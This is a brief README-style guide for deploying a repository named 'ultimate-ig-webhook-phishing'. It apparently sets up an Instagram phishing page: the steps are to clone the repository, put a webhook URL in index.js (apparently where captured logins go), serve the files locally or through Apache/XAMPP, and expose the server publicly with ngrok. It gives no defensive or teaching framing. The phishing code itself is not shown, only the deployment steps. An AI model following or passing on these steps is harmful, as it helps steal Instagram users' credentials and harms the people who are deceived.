- Clone this repository:
git clone https://github.com/antonchu2006/ultimate-ig-webhook-phishing.git
cd ultimate-ig-webhook-phishing
-
Change webhook URL in index.js
-
Start a http web in the directory (or move repository files to apache / xampp / wampp html folder)
python3 -m http.server
- Open webserver port OR start ngrok
./ngrok http <webserver port>
- Check if it works!